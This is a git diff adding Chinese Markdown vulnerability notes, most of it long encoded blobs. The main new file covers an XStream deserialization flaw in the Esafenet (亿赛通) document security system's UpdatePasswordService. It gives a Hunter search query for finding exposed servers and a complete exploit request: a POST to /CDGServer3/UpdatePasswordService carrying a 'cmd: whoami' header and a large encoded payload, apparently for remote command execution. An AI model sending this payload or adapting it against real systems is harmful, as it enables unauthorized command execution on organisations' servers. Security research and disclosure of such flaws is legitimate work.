JNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706606528048-8db70095-33a1-4941-94a8-a0d512f0b4a5.png](./img/QzrzLUujmmYPkzrW/1706606528048-8db70095-33a1-4941-94a8-a0d512f0b4a5-577917.png)
+
+
+
+> 更新: 2024-04-20 22:01:32  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xrwugqxrk5g7r02e>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统UpdatePasswordService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统UpdatePasswordService存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..75d6618
--- /dev/null
+++ b/亿赛通电子文档安全管理系统UpdatePasswordService存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统UpdatePasswordService存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统UpdatePasswordService存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/uoP4yQeuB8LIwH0S/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-204601.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/UpdatePasswordService HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGME